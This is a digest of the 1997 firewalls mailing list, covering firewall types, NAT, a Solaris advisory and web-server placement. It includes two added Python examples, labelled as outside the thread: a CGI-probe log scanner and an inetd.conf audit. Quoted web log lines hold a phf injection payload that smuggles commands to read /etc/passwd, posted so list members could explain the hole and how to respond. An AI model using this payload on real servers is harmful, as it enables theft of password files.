the packets itself - failure of the firewall means forwarding has also
failed since the underlying system will so - sorry, I won't do it).

> 3 - If you are using a packet filter system and you provide SMTP,
> HTTP, etc. you cannot control what the users do with those
> protocols, i.e., you open or close a port. Application level
> firewalls provide secure daemons of those protocols.

Here is where I agree 100%. You can not, with a packet filter or pure
stateful-inspection firewall, filter what people do over those ports.
The best firewalls out there are those that are not really out there
yet. They are hybrids of stateful-inspection and application level
firewalls. Stateful inspection allows me to filter and manage even UDP
connections (good old NTP for example which I have customers who *must*
have it) but I need application level firewalls to control the garbage
being stuffed over http these days, or to protect the smtp port....I
like stateful-inspection firewalls because they watch the high-ports
for me and close them when a FIN is sent for a specific communications
and log any probes on these ports.
There are benefits to both technologies: stateful-inspection and
application gateways. I will admit pure, old style ACL packet filtering
is insecure and limited in its usefulness if used alone but only because
certain protocols have unusual requirements (FTP in Active mode) and
that someone figured out how to send RST packets to still open high
ports and other fun and games with the IP protocols.

The advance of the exploits to a given technology require new tools to
counter them. Old style ACL packet filtering was good when it first hit
because it was all we thought we needed. Then someone figured out how to
spoof packets and work around on high ports. Now we have countered that
with application level firewalls which control even the content but are
limited in what types of protocols can go through (which is a good thing
and a bad thing). Stateful Inspection firewalls came along and said,
lets have it somewhere in the middle (ok, closer to packet filtering
firewalls but with communications state built in). There will be
exploits found in both of these technologies as well - between
mis-configuration, TCP sequence attacks, man-in-the-middle attacks, etc,
there are enough hacks out there that say the real issues are beginning
to reach beyond whether you are using packet filtering, stateful
inspection or application level firewalls, and beg for a new style of
firewall - a new technology....

(And, No I don't think that it is Abir-Net.....;-)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Daniel Blander =8^)
Sr.
Systems Engineer
Applied Computer Solutions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Phone: (714) 842.7800
Fax:   (714) 842.8299
Email: Daniel.Blander@acsacs.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.acsacs.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From owner-firewalls-outgoing Wed Jun 4 11:54:30 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA12279 for firewalls-outgoing; Wed, 4 Jun 1997 09:57:51 -0700 (PDT)
Received: from silence.secnet.com ([199.185.231.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA10092 for ; Wed, 4 Jun 1997 09:42:41 -0700 (PDT)
Received: from localhost (oliver@localhost) by silence.secnet.com (8.8.5/secnet) with SMTP id KAA20536 for ; Wed, 4 Jun 1997 10:50:00 -0600 (MDT)
Date: Wed, 4 Jun 1997 10:49:59 -0600 (MDT)
From: Oliver Friedrichs
To: firewalls@greatcircle.com
Subject: [SNI-14]: Solaris rpcbind vulnerability
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

We have just released a security advisory which affects individuals
filtering rpcbind under Solaris 2.x platforms. The advisory is
available at

http://www.secnet.com/advisories/sni-14.solaris.rpcbind.advisory.html

- Oliver

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Secure Networks Incorporated.
Calgary, Alberta, Canada, (403) 262-9211

From owner-firewalls-outgoing Wed Jun 4 12:10:55 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA12571 for firewalls-outgoing; Wed, 4 Jun 1997 09:59:39 -0700 (PDT)
Received: from grab (grab.coslabs.com [199.233.92.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA12482 for ; Wed, 4 Jun 1997 09:59:16 -0700 (PDT)
Received: from future.mulligan.com by grab (SMI-8.6/SMI-SVR4) id LAA00853; Wed, 4 Jun 1997 11:02:49 -0600
Received: from future by future.mulligan.com (SMI-8.6/SMI-SVR4) id LAA28796; Wed, 4 Jun 1997 11:02:42 -0600
Message-Id: <199706041702.LAA28796@future.mulligan.com>
X-Mailer: exmh version 2.0gamma 1/27/96
To: Anton J Aylward
cc: "Mark Horn [ Net Ops ]" , Firewalls@GreatCircle.COM
Subject: Re: Plug-gw- One to many relationship
In-reply-to: Your message of "Wed, 04 Jun 1997 11:49:24 EDT." <3.0.32.19970604114909.00952700@the-wire.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Wed, 04 Jun 1997 11:02:42 -0600
From: Geoff Mulligan
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

anton@the-wire.com said:
> One public address, and a 10.x.x.x of internal addresses and web
> servers. POW! The address space problem just went away.

Just get a box that does Network address translation and POW you have a
class a on one side and couple of addresses on the other. That's what I
have, not that I really need a class a for my dozen or so machines.
        geoff

From owner-firewalls-outgoing Wed Jun 4 12:49:43 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA14549 for firewalls-outgoing; Wed, 4 Jun 1997 10:11:17 -0700 (PDT)
Received: from challenger.atc.fhda.edu (challenger.atc.fhda.edu [153.18.200.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA14459 for ; Wed, 4 Jun 1997 10:10:58 -0700 (PDT)
Received: from localhost (manek@localhost) by challenger.atc.fhda.edu (8.8.0/8.7.3) with SMTP id KAA03229 for ; Wed, 4 Jun 1997 10:14:45 -0700 (PDT)
Date: Wed, 4 Jun 1997 10:14:45 -0700 (PDT)
From: "Sameer R. Manek"
To: firewalls@greatcircle.com
Subject: firewall setup
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The other day someone drew an ASCII map of how the network should be
setup. It looked something like this

    ---> gateway -+-> firewall ---> internal net
                  |
                  mail server

In this setup I don't really seem to understand the purpose of the
gateway. Here, my intro to tcp/ip protocols book defines a gateway as a
device that translates between protocols. The book suggests it would
translate between one network protocol to another, ie tcp/ip -> ipx or
appletalk for example. I suppose a gateway could also do NAT and ip
masquerading, but assuming you aren't doing any form of nat what is the
purpose of a gateway? wouldn't a packet filtering router do a better job
with greater security?

Also is nat more desirable, from a security stand point?

--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Sameer Manek                          manek@challenger.atc.fhda.edu
Commercial Zen:See the dew, do the dew, be the bunny, avoid the Noid.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

From owner-firewalls-outgoing Wed Jun 4 14:47:47 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA23901 for firewalls-outgoing; Wed, 4 Jun 1997 13:39:47 -0700 (PDT)
Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA23746 for ; Wed, 4 Jun 1997 13:39:15 -0700 (PDT)
Received: from dns1 (dns1.ci.chi.il.us [199.177.48.3]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with SMTP id NAA25499 for ; Wed, 4 Jun 1997 13:45:17 -0700 (PDT)
Received: by dns1 (SMI-8.6/SMI-SVR4) id PAA29593; Wed, 4 Jun 1997 15:36:09 -0500
From: minaba@dns1.ci.chi.il.us (Mark Inaba)
Message-Id: <199706042036.PAA29593@dns1>
Subject: audio/video streams
To: Firewalls@GreatCircle.COM
Date: Wed, 4 Jun 1997 15:36:09 -0500 (CDT)
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

does anyone have any horror stories (or just warnings) about letting
video/audio streams through a firewall? I don't recall seeing anything
recently, but i've been blurring through things.
Thanks
-Mark

From owner-firewalls-outgoing Wed Jun 4 14:54:43 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA22028 for firewalls-outgoing; Wed, 4 Jun 1997 10:49:35 -0700 (PDT)
Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA21738 for ; Wed, 4 Jun 1997 10:48:26 -0700 (PDT)
Received: from baker.vnw.com (baker.vnw.com [192.220.175.88]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id KAA21789 for ; Wed, 4 Jun 1997 10:26:18 -0700 (PDT)
Received: by baker.vnw.com with Internet Mail Service (5.0.1457.3) id ; Wed, 4 Jun 1997 10:24:27 -0700
Message-ID: <103BEF1175D2D011B83400A0C903EE964331@hurricane.vnw.com>
From: zzIML Firewalls
To: "'Firewalls@GreatCircle.COM'"
Subject: Do people host WWW servers behind firewalls?
Date: Wed, 4 Jun 1997 10:24:29 -0700
X-Priority: 3
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.0.1457.3)
Content-Type: text/plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

This has been an ongoing planning debate for us... does the potential
latency and overhead of a firewall potentially point toward putting
high-access high-performance WWW servers on the net without a firewall?
Is there a true trade-off of "security vs. performance"?

Presume that the WWW servers are at a co-location ISP site and don't
have any "critical data" on them. They are mostly publish sites...

What is the norm for large sites, say 10MB connected sites or DS3 (45MB)
connected sites... Are large public WWW servers typically "behind a
firewall" or are they in the clear? Yahoo, Microsoft, Netscape, etc? I
mean the large sites... 1,000,000/hits a day sites? What about
10,000,000/hits a day?

If there is a discussion in the archives that might be of use, let me
know...
Thank you, Stephen Gutknecht mailto:StephenG@vnw.com From owner-firewalls-outgoing Wed Jun 4 15:19:56 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA11333 for firewalls-outgoing; Wed, 4 Jun 1997 09:50:24 -0700 (PDT) Received: from smartwall.v-one.com (smartwall.v-one.com [206.205.89.11]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA11304 for ; Wed, 4 Jun 1997 09:50:06 -0700 (PDT) Received: by smartwall.v-one.com; id MAA20117; Wed, 4 Jun 1997 12:53:48 -0400 (EDT) Received: from nt-fs1.v-one.com(198.69.135.3) by smartwall.v-one.com via smap (V3.1.1) id xma020114; Wed, 4 Jun 97 12:53:37 -0400 Received: by nt-fs1.V-ONE.COM with Internet Mail Service (5.0.1457.3) id ; Wed, 4 Jun 1997 13:01:00 -0400 Message-ID: From: "McMahan, Peg" To: firewalls@GreatCircle.COM Subject: Checkpoint Firewall-1: VPN and Remote Administration Date: Wed, 4 Jun 1997 13:00:59 -0400 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1457.3) Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am wondering about the remote management capabilities of the Checkpoint Firewall-1? If an admin is responsible for admining several firewalls in different locations, is remote administration possible? If so, is it relatively simple in setup, and how secure is it? Are the communications strongly authenticated? How about encrypted? Also, with the product SecuRemote, does that software replace the client PC's TCP Stack? Margaret H. McMahan V-ONE Corporation 1803 Research Blvd, Suite 305 Rockville MD, 20850 (301)838-8900 . 
224 From owner-firewalls-outgoing Wed Jun 4 15:39:22 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA00315 for firewalls-outgoing; Wed, 4 Jun 1997 14:09:49 -0700 (PDT) Received: from ibmmail.COM (ibmmail.com [204.146.168.193]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA00215 for ; Wed, 4 Jun 1997 14:09:25 -0700 (PDT) From: uskanbye@ibmmail.com Message-Id: <199706042109.OAA00215@honor.greatcircle.com> Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 4764; Wed, 04 Jun 97 17:13:14 EDT Date: Wed, 04 Jun 1997 17:13:11 EDT To: firewalls@GreatCircle.COM X-Sender-Info: Mitchell Ummel CSP CCP EMAIL:mummel@kdhe.state.ks.us Office of Information Systems, Tech Services Section MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: Eagle Raptor NT 4.0 and "Local Tunnel" Config Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Anybody out there using the local (null) tunnel feature in the Eagle NT 4.0 firewall? We're attempting to configure this, in conjunction with filters, to pass some protocols that can't be GSP'd (Data Link Switching/DLSw). Any advice/comments/suggestions welcomed. Thanks! 
--------KANSAS DEPARTMENT OF HEALTH & ENVIRONMENT---------
---------------WWW.STATE.KS.US/PUBLIC/KDHE----------------
--------------Landon State Office Building----------------
------------------Phone (913) 296-5643--------------------

From owner-firewalls-outgoing Wed Jun 4 15:54:10 1997
From: girsch@marben.com (Arnaud Girsch)
To: swnuck@unixpros.com (Stan Wnuck)
Cc: Firewalls@GreatCircle.COM
Subject: Re: getting passwd file via WWW
Date: Wed, 4 Jun 1997 14:08:14 -0700 (PDT)
Message-Id: <199706042108.OAA27744@mail.marben.com>
In-Reply-To: <199706041601.JAA03033@honor.greatcircle.com> from "Stan Wnuck" at Jun 4, 97 12:04:34 pm

> I have noticed on my WWW log files the following 2 entries.
>
> some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140
> some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143
>
> Does anyone know anything about these cgi scripts or programs?
> Or how dangerous this is?

These are well known cgi scripts containing security holes.

The phf script coming with the default NCSA server is buggy, and should be disabled (it allows execution of shell programs).

Arnaud.
--
Arnaud Girsch -+- Marben Products, Inc. / DSET Corporation - San Jose, CA
agirsch@marben.com -+- http://www.marben.com/ -+- http://www.dset.com/

From owner-firewalls-outgoing Wed Jun 4 16:17:32 1997
From: Alan
To: Stan Wnuck
cc: Firewalls@GreatCircle.COM
Subject: Re: getting passwd file via WWW
Date: Wed, 4 Jun 1997 10:44:03 -0700 (PDT)
In-Reply-To: <199706041601.JAA03033@honor.greatcircle.com>

On Wed, 4 Jun 1997, Stan Wnuck wrote:

> Hi all,
>
> I have noticed on my WWW log files the following 2 entries.
>
> some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140
> some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143
>
> Does anyone know anything about these cgi scripts or programs?
> Or how dangerous this is?

You have just been hacked.

Get rid of the phf script. It has a major security hole. (You may want to upgrade your server to something more recent as well, as there are other holes to worry about.)

Change all passwords. They have your password file and are probably running crack on it as you read this.

alano@teleport.com | "Those who are without history are doomed to retype it."

From owner-firewalls-outgoing Wed Jun 4 16:18:03 1997
From: carson@lehman.com
To: Anton J Aylward
Cc: "Mark Horn [ Net Ops ]", Firewalls@GreatCircle.COM
Subject: Re: Plug-gw- One to many relationship
Date: Wed, 4 Jun 1997 14:24:02 -0400
Message-Id: <199706041824.OAA19517@dragon.lehman.com>
In-Reply-To: <3.0.32.19970604114909.00952700@the-wire.com>
Reply-To: carson@lehman.com

>>>>> "Anton" == Anton J Aylward writes:

Anton> Now that's what *I* call a one to many mapping. You come up with a
Anton> good way to do this and you'll be famous.

Anton> One public address, and a 10.x.x.x of internal addresses and web
Anton> servers. POW! The address space problem just went away.

It's called NAT (or NAPT) and is part of ip-filter. There are even diffs for making the fwtk app proxies work with it.

Next question?

--
Carson Gaspar -- carson@cs.columbia.edu carson@lehman.com
http://www.cs.columbia.edu/~carson/home.html

From owner-firewalls-outgoing Wed Jun 4 16:30:51 1997
From: Geoff Mulligan
To: zzIML Firewalls
cc: "'Firewalls@GreatCircle.COM'"
Subject: Re: Do people host WWW servers behind firewalls?
Date: Wed, 04 Jun 1997 17:18:06 -0600
Message-Id: <199706042318.RAA05256@future.mulligan.com>
In-reply-to: Your message of "Wed, 04 Jun 1997 10:24:29 PDT." <103BEF1175D2D011B83400A0C903EE964331@hurricane.vnw.com>

I am pretty sure that the pathfinder site is behind a firewall.

Using something like a stateful packet screen rather than a proxy relay for the firewall will introduce little latency and provide the added protection.
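The phf and php.cgi entries Stan Wnuck quoted earlier in this thread, and the two replies to them, describe what to look for in a web server's access log. As an added example that is not part of the thread or of any product, here is a small log scanner in Python: it parses common-log-format lines, URL-decodes the query string so the injected newlines (%0A) become visible, and flags requests to the CGI programs the thread names. The sample log lines are the two from the thread plus one constructed benign hit; the VULNERABLE_CGI set is an assumption limited to what the thread mentions, and the LOG_RE pattern and function names are the example's own.

```python
import re
from urllib.parse import unquote

# NCSA common log format, as in the entries quoted in the thread:
#   host ident authuser [date] "method target [protocol]" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<when>[^\]]*)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>\S+))?" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)$'
)

# CGI programs the thread names as known-vulnerable. A real list is kept
# current from vendor advisories; these two are only what the thread shows.
VULNERABLE_CGI = {"phf", "php.cgi"}

# Constructed sample: the two entries quoted in the thread plus one benign hit.
SAMPLE_LOG = [
    'some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?'
    'Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A'
    '&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy='
    '&Qhigh_school=&Qslip= HTTP/1.0" 200 140',
    'some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] '
    '"GET /cgi-bin/php.cgi?/etc/passwd" 404 143',
    '10.1.2.3 - - [28/Apr/1997:02:10:05 -0500] "GET /index.html HTTP/1.0" 200 2326',
]


def parse_log_line(line):
    """Parse one common-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    entry = m.groupdict()
    path, _, query = entry["target"].partition("?")
    entry["path"] = path
    entry["query"] = unquote(query)   # %0A -> newline, %20 -> space, and so on
    entry["status"] = int(entry["status"])
    return entry


def classify(entry):
    """Reasons this entry looks like a CGI probe; an empty list means none."""
    reasons = []
    script = entry["path"].rsplit("/", 1)[-1]
    if "/cgi-bin/" in entry["path"] and script in VULNERABLE_CGI:
        reasons.append(f"request to known-vulnerable CGI program {script}")
    # phf's hole is newline injection: a decoded newline in the query means
    # extra text was appended to the command line phf builds.
    if "\n" in entry["query"]:
        reasons.append("newline injected into CGI query")
    if "/etc/passwd" in entry["query"]:
        reasons.append("query references /etc/passwd")
    if reasons and entry["status"] == 200:
        reasons.append("server answered 200: assume the probe succeeded")
    return reasons


def scan(lines):
    """Return (host, path, status, reasons) for every suspicious entry."""
    findings = []
    for line in lines:
        entry = parse_log_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings.append((entry["host"], entry["path"], entry["status"], reasons))
    return findings


if __name__ == "__main__":
    for host, path, status, reasons in scan(SAMPLE_LOG):
        print(f"{host} {path} {status}: {'; '.join(reasons)}")
```

The status code matters as much as the URL: the php.cgi request got a 404, so that program was not present, while the phf request got a 200, which is the case Alan's advice covers (the script was there and ran, so treat the password file as disclosed and change every password). The scanner reports the two differently for that reason.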
geoff

From owner-firewalls-outgoing Wed Jun 4 16:52:41 1997
From: "Michael H. Warfield"
To: wombat@mcfeely.bsfs.org (Rabid Wombat)
Cc: jk@stallion.ee, Firewalls@GreatCircle.COM
Subject: Re: Security Crazy
Date: Wed, 4 Jun 1997 14:35:10 -0400 (EDT)
In-Reply-To: from "Rabid Wombat" at Jun 4, 97 11:28:25 am

Rabid Wombat enscribed thusly:

> On Sun, 1 Jun 1997, Jyri Kaljundi wrote:
> > Sat, 31 May 1997, Marcus J. Ranum wrote:
> > >> my CEO has gone security crazy [...] win95
> > >
> > > He's a bit unclear on the concept, isn't he?
> >
> > I am pretty sure there actually are good commercial systems available to
> > make large number of win95 machines much more secure than as they are
> > out-of-box.

> All things are relative ...

Really! It would be one hell of a challenge to make it LESS secure. Considering your starting point, you got a lot more room to work with and try to make it more secure. :-) :-)

My favorite app for making Windows 95 secure is the Windows NT installation disks! :-) Or Linux, or BSD, or whatever secure operating system will do YOUR job.

Mike
--
Michael H. Warfield   |  (770) 985-6132  |  mhw@WittsEnd.com
(The Mad Wizard)      |  (770) 925-8248  |  http://www.wittsend.com/mhw/
NIC whois: MHW9       |  An optimist believes we live in the best of all
PGP Key: 0xDF1DD471   |  possible worlds. A pessimist is sure of it!

From owner-firewalls-outgoing Wed Jun 4 17:37:35 1997
From: "Craig I. Hagan"
Reply-To: hagan@cih.com
To: Firewalls@GreatCircle.COM
Subject: Re: Plug-gw- One to many relationship
Date: Wed, 4 Jun 1997 13:36:29 -0400 (EDT)
In-Reply-To: <19970604104101.02710@capmark.funb.com>

> exploit a feature of some operating systems. That feature is that you can
> assign many IP addresses to a single ethernet interface. I don't know how
> many OS's support this, but I know SunOS doesn't and Solaris does.
> [...]
>
> You want both clients to be able to plug to either server. To accomplish
> this, assign two addresses to the firewall on the client side and two
> addresses to the firewall on the server side so that you have:

Heck, why not make it a transparent proxy? I've done that already (ftp.cih.com:~hagan/pub/fix-kits/fwtk/trans.diff.gz [*], NB: old patches).

The advantage there is that you don't have to have 8 batrillion entries: permit what you want and let plug-gw figure out the destination host from 'its' IP address as given by the OS. I'll admit that I've only done this with Linux, but, as many have said, Solaris and other OSes should work, too.

[*] #include #include

--
craig
-------------------------------------------------------------------------------
Craig I. Hagan     "It's a small world, but I wouldn't want to back it up"
hagan@cih.com      "True hackers don't die, their ttl expires"
                   "It takes a village to raise an idiot, but an idiot can raze a village"

From owner-firewalls-outgoing Wed Jun 4 17:54:01 1997
From: "James R. Leu"
To: klemmerj@webtrek.com
Cc: firewalls@GreatCircle.COM
Subject: ipfwadm / masquerading question
Date: Wed, 4 Jun 1997 13:48:23 -0500 (CDT)
Message-Id: <199706041848.NAA29138@chaos.coredcs.com>
In-Reply-To: from "Joe Klemmer" at Jun 4, 97 08:09:15 am

I am setting up a Linux box with a V.35 card and two ethernet cards. The V.35 card is the connection to the net. The ethernet cards are connections to the public and private nets. The private net is being masqueraded; the public net is using real addresses.
Here is the setup:

    Real addresses/24      192.168.1.8/30              192.200.9.0/24
        .2                .9         .10-------------------.211 |
                          --------------                        |<-- Private Net ->
    <----------| ISP Router |<----------->| Customer router |
                          --------------                        |<-- Public Net -->
                                          -------------------.1 |
                                                   Real addresses/24

The problem is that IP masquerading translates the from address of packets from the hidden net to the address of the interface it will be leaving on. In this case addresses from 192.200.9.0 will be masqueraded to 192.168.1.10. Is there a way to override this default behavior? I would like the from address of packets from the private net to be translated to .1.

I realize I could make the V.35 card an un-numbered interface and be done with it, but I would really like to solve this with ipfwadm.

Any ideas?

James
--
James R. Leu
Network Administrator
CORE Digital Communication Services
jleu@coredcs.com

From owner-firewalls-outgoing Wed Jun 4 18:21:58 1997
From: rob@compute.com (Robert Roell -Network Intensive)
To: RICK FRATACCIA, firewalls@GreatCircle.COM (IPM Return requested), msquared@hypercon.com (IPM Return requested)
Subject: Re: RAPTOR WEBNOT SITE BLOCKING
Date: Wed, 4 Jun 1997 13:31:56 -0700
Message-Id: <9706042031.AA29192@compute.com>

At this time, Raptor only supports the WEBNOT facility.

rob

] [On Jun 4, RICK FRATACCIA wrote:]
] Subject: Re: RAPTOR WEBNOT SITE BLOCKING
]
] Mike,
]      In reference to your comment, do you know if cybernot will work
] with raptor 4.0 on Solaris? Raptor personnel say that only WebNOT
] works with Raptor.
]
] Rick
]
] ______________________________ Reply Separator _________________________________
] Subject: RAPTOR WEBNOT SITE BLOCKING
] Author:  msquared@hypercon.com at SMTPMAIL
] Date:    6/3/97 7:07 PM
]
] It was written:
] " >From: Allen Rogers
] >Subject: Re: Does Raptor WebNOT Block Legitimate Sites?
] >
] >
] >This is a list that Raptor licenses directly from Microsystems. The actual
] >URLs used, and their abbreviated nature, is due to how Microsystems chooses
] >to create their list. I am trying to open a formal path where our customers
] >can present queries/requests to them directly for particular sites. I will
] >keep you posted."
]
]
] >CyberPatrol gives two forms at their site for 1) adding a site to
] the list of blocked sites - http://www.microsys.com/cybernot/form_add.htm
] or 2) removing a site from the list - http://www.microsys.com/cybernot/form_rev.htm.
]
] I've seen them take action in as little as two hours. They have always
] responded the next business day with a confirming mail note.
]
] Mike
]-- End of excerpt from --

-------------------------------------------------------------
N E T W O R K   I N T E N S I V E        A Member of the Verio Group
www.ni.net
Robert Roell
Senior Internet Systems Engineer
rob@compute.com
Phone 714-450-8400
-------------------------------------------------------------

From owner-firewalls-outgoing Wed Jun 4 18:24:21 1997
From: Mike Hedlund
To: zzIML Firewalls
cc: "'Firewalls@GreatCircle.COM'"
Subject: Re: Do people host WWW servers behind firewalls?
Date: Wed, 4 Jun 1997 17:35:05 -0700 (PDT)
In-Reply-To: <103BEF1175D2D011B83400A0C903EE964331@hurricane.vnw.com>

On Wed, 4 Jun 1997, zzIML Firewalls wrote:

> This has been an ongoing planning debate for us... does the potential
> latency and overhead of a firewall potentially point toward putting
> high-access high-performance WWW servers on the net without a firewall?
> Is there a true trade-off of "security vs. performance"?
>

A firewall doesn't necessarily mean you're secure. Carefully securing your machine(s) at a host level is a good way to start. It's amazing how many large sites out there don't do basic audits of their own sites, i.e., disabling all nonessential services, etc. The more possible entry points you eliminate for an intruder, the harder it will be for them to get in. And by making it more difficult to get in, hopefully they have to do something which you will notice.

> Presume that the WWW servers are at a co-location ISP site and don't
> have any "critical data" on them. They are mostly publish sites...
>

I think most organizations who put money into developing a site on the net, be it web/ftp/chat whatever, have a vested interest in keeping it secure. Not because they are worried about people seeing data they shouldn't see, but because of the publicity you will get after being hacked. I could see it now: some CEO of a big company turns on CNN to hear a story about how a 12-year-old kid hacked his company's website from school and put up a banner saying 'Im g0d'. It doesn't matter if the kid got anything important.

> What is the norm for large sites, say 10MB connected sites or DS3 (45MB)
> connected sites... Are large public WWW servers typically "behind a
> firewall" or are they in the clear? Yahoo, Microsoft, Netscape, etc?
> I mean the large sites... 1,000,000/hits a day sites? What about
> 10,000,000/hits a day?
>

Most sites that large are not connected behind a single large pipe; in fact most are distributed around the net, so it would be possible to firewall their individual smaller sites. Although not all sites do.
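Mike's point about host-level audits (disable every nonessential service before worrying about the firewall in front) can be checked mechanically, since on a Unix host of that era most network services are switched on in inetd.conf. The following is an added example, not something from the thread or from any vendor: it reads an inetd.conf, lists what is enabled, reports every service outside a required-services allowlist, and emits a hardened copy with those lines commented out. The inetd.conf text and the REQUIRED_SERVICES allowlist are constructed for the example; a real allowlist comes from the site's own policy.

```python
# Services a public "publish" web host is assumed to need from inetd. Everything
# else found enabled is reported. Constructed for the example.
REQUIRED_SERVICES = {"ftp"}

# Constructed sample inetd.conf, typical of a default Unix install of the time:
# service  socket  proto  wait/nowait  user  server-program  args
SAMPLE_INETD_CONF = """\
# inetd.conf (constructed sample)
ftp      stream  tcp  nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet   stream  tcp  nowait  root    /usr/sbin/tcpd  in.telnetd
shell    stream  tcp  nowait  root    /usr/sbin/tcpd  in.rshd
login    stream  tcp  nowait  root    /usr/sbin/tcpd  in.rlogind
finger   stream  tcp  nowait  nobody  /usr/sbin/tcpd  in.fingerd
#tftp    dgram   udp  wait    root    /usr/sbin/tcpd  in.tftpd
echo     stream  tcp  nowait  root    internal
"""


def enabled_services(conf_text):
    """Return [(service, protocol, user, server_path)] for each active line."""
    out = []
    for line in conf_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue                      # blank or already disabled
        fields = line.split()
        if len(fields) < 6:
            continue                      # malformed line: inetd would reject it too
        out.append((fields[0], fields[2], fields[4], fields[5]))
    return out


def audit(conf_text, required=REQUIRED_SERVICES):
    """List (service, protocol, note) for every enabled service not in the allowlist."""
    findings = []
    for svc, proto, user, server in enabled_services(conf_text):
        if svc in required:
            continue
        note = "nonessential service enabled"
        # A root-owned external server program is the larger exposure; inetd's
        # built-in services ("internal") run inside inetd itself.
        if user == "root" and server != "internal":
            note += "; runs as root"
        findings.append((svc, proto, note))
    return findings


def harden(conf_text, required=REQUIRED_SERVICES):
    """Return a copy of inetd.conf with every nonessential service commented out."""
    lines = []
    for line in conf_text.splitlines():
        stripped = line.strip()
        if stripped and not stripped.startswith("#") and stripped.split()[0] not in required:
            lines.append("#" + line + "   # disabled: not required on this host")
        else:
            lines.append(line)
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    for svc, proto, note in audit(SAMPLE_INETD_CONF):
        print(f"{svc}/{proto}: {note}")
    print(harden(SAMPLE_INETD_CONF))
```

Running audit() on the sample reports telnet, shell, login, finger and echo; the hardened output leaves only ftp active and audits clean. Repeating the same check after every OS upgrade or package install is the "basic audit" Mike is talking about, since vendor installs tend to re-enable what an administrator turned off.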
-mike

